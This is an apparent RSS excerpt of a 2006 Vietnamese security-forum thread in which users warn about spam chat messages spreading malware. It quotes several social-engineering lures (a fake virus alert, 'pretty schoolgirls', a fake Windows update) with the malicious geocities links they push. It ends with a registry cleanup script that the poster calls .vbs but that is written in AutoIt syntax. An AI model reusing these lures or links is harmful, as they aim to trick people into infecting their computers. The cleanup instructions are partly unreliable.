		<pre>Hien nay da xuat hien mot loai virus moi co kha nang xoa sach du
 lieu cua may tinh khi bi nhiem . Chi can 1 cu' click la ban da nhiem loai 
virus nay. Pho`ng benh hon chua benh, cac ban nen doc bai viet sau de
 tranh viec bi di'nh loai virus nguy hiem nay : <span class="link"> http://www.geocities.co.jp/thanatos18388</span> &lt;&lt;</pre>
		</div>
Mấy thằng này nó rảnh thật  :(( . Hên là tui cảnh giác cao độ lên HVA thì thấy cái trang này giống của bác havythoai post ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23765</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23765</link>
				<pubDate><![CDATA[Sat, 16 Sep 2006 12:31:44]]> GMT</pubDate>
				<author><![CDATA[ Z3ro]]></author>
			</item>
			<item>
				<title>Re: Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ Tiếp nữa nè =.=' tụi nó rảnh thật , ai rảnh coi dùm con này nó ra sao =.='
<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>ha`i dek chiu dc =&#41;&#41;<span class="link"> http://music.geocities.jp/nhacso24h/</span> =&#41;&#41; =&#41;&#41;</pre>
		</div>
<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>check this link for me :<span class="link"> http://music.geocities.jp/nhacso24h/</span> . Why I cannot surf this site ???</pre>
		</div>
<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>HOT HOT, girl xinh cac truong PTTH o Ha Noi ?<span class="link"> http://music.geocities.jp/nhacso24h/</span></pre>
		</div>
<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>Now you can avoid some critical online viruses by updating Windows . 
Click here to know how to Update your Windows : <span class="link"> http://music.geocities.jp/nhacso24h/</span></pre>
		</div>]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23848</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#23848</link>
				<pubDate><![CDATA[Sat, 16 Sep 2006 21:35:56]]> GMT</pubDate>
				<author><![CDATA[ Z3ro]]></author>
			</item>
			<item>
				<title>Lại thêm 1 thằng này mới điên</title>
				<description><![CDATA[ RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "0")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "0")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "0")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page", "REG_SZ", "about:blank")
RegDelete("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz\content url",$website)
RegDelete("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast\content url","")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Task Manager",@WindowsDir & "\taskmng.exe")
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","")

Save vao file .vbs chay thui , restart xoa file lạ trong windows]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/3935.hva#24415</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/3935.hva#24415</link>
				<pubDate><![CDATA[Tue, 19 Sep 2006 14:19:32]]> GMT</pubDate>
				<author><![CDATA[ StupidCom]]></author>
			</item>
	</channel>
</rss>
